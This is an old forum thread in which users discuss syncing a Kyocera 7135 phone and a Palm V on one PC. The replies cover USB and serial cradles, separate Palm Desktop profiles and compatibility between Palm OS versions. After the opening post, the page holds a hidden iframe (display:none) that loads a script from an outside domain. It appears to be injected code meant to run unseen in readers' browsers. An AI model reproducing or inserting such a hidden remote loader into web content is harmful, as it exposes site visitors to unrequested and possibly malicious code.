+ Reply to Thread

Thread: Palm and 7135

Palm and 7135

I am hoping to get a 7135 as soon, but my wife brought up an important point.

She still has her own Palm 5 (running an earlier version of Palm OS). Will it be possible to have both the 7135 cradle and Palm 5 cradle hooked to the PC at the same time? Will the 7135 Palm OS Software update the Palm 5 as well?

Or do the two have to be kept separate (either installs or computers)? Has anyone tried this?

Thanks in advance,

Neal

<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    Well, yes, if you want to use one serial port (unless you purchased a USB converter for your Palm V), you can purchase a splitter, which you might be able to purchase online, although it's very easy to build one yourself. The only catch there.. you probably can't have both units in the cradle at the same time when you're trying to synch one of them.

The 7135 also will allow you to synchronize via USB, so you can use either! Note that USB will synch faster on the 7135, but not on the V.
    Hope this is helpful!
    Mike
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Re: Palm and 7135

Originally posted by NealH
    Will the 7135 Palm OS Software update the Palm 5 as well?
    I'm a little confused also as I continue to charge my new 7135. The instructions say: "If you have not used a Palm organizer before, open the literature kit and take out the CD-ROM..."

It appears that you can use your existing software (Palm 5 CD) with the 7135 so maybe there would be no updates to the desktop with the 7135 in your case.

Administrator
    she can have her palm via serial conection and you use yours via the usb (and therefore a different comm port).
    for instance, i have the i330 which uses a usb connection (but is serial, different comm port #) and my fiance uses my i300, which has a serial cradle (on comm 1). i have them both conected at the same time and we have 2 profiles on the same pc. you can only sync one at a time of course, but you can do it. just make sure you select the correct profile when syncing...

poked back in
    I was confused, but I'll say it... he means Palm V. Not a Palm with OS 5.

Unless you want them to, your two devices will never know of each others existence.
    Look at Palm Desktop. Your current username is always a dropdown dialog box.

I should have been more clear. My wife has a Palm V running an earlier version of the Palm OS.

So if I understand correctly, I can install the software that comes with the 7135, have a USB cradle for the 7135 and a serial cradle for the Palm V. Both phone and pda will be running the new version of the operating system, and as long as I only sync one at a time using their separate profiles, there should be no problems.

Thanks.

Neal

Originally posted by NealH
    I should have been more clear. My wife has a Palm V running an earlier version of the Palm OS.

So if I understand correctly, I can install the software that comes with the 7135, have a USB cradle for the 7135 and a serial cradle for the Palm V. Both phone and pda will be running the new version of the operating system, and as long as I only sync one at a time using their separate profiles, there should be no problems.
    I don't think anybody has answered your question yet... Unless somebody has already tried it you may have to experiment or query probably both Palm and/or Kyocera.[list=1][*]Your wife is probably running 3.5? and you will be running 4.1 -- will the Kyocera Sync Manager/Palm Desktop handle 2 users with those respective OS's?[*]Will the Kyocera Sync Manager/Palm Desktop install any software that might conflict with your Wife's V running 3.5[/list=1]
    Palm is not a startup anymore and I would expect their Desktop software to be backward compatible with older Palm OSs. I would also expect them to be able to handle different users using different versions. I have read that you need to do something on the desktop before syncing the first time to migrate your stuff from an existing PDA to the 7135. If this is all done under the user's directory under the Palm directory I would expect everything might work OK.

Does your wife use BackupBuddy? If so, I would copy your entire Palm directory somewhere else and then give it a shot. Worst case you have to copy it back and reload your Wife's palm V.

-Quick

Administrator
    sicne you guys have OS 4.1 on your phones and i am still using 3.5.2 then i would imagine that the desktop will support both versions. i htought i answered his question, but perhaps i left out something....

the way i see it is that since they are both palm devices and are atleast 3.5 and later then i dont see a reason why they cant hook up both devices to the pc. worse case if they both had serial, then one would have to power off the pc and then unplug one charger from the serial port and reconnect the other in order to sync two SERIAL only devices, but since the kyo has a usb connection , they should be able to use both, but only syncing one at a time.

moral of the story, be sure and get palm desktop 4.1. if you dont have 4.1 now, i would go ahead and download it... you can be benefiting form the newer desktop version anyway...

I have 8 profiles set up on my laptop, each for a separate Palm. I have OS versions 3.5.2, 3.5.3 and 4.1 all work just fine. Most of the Palms are used for a custom data collection app. A couple are personal Palms for me and my girlfriend. Some are USB and some are serial.

I am using a palm m505 (os 4.1) and my wife is using a handspring (os 3.5). When you load your new software you both will have to get used to the new way palm handles the various applications, but once you do you'll like it much better. When I upgraded the new desktop software recognized both units without any trouble.

My wife is wondering when she might be getting her slightly used m505. I keep telling her, "just a couple more weeks"..... "just a couple more weeks". I sound like my verizon rep.

It should work fine.

Just be careful to keep the profiles seperate - If the prefs file from an old Palm gets synced to a 6035/7135, it can caus problems. But beyond initial setup, the software should have no problems with multiple Palms.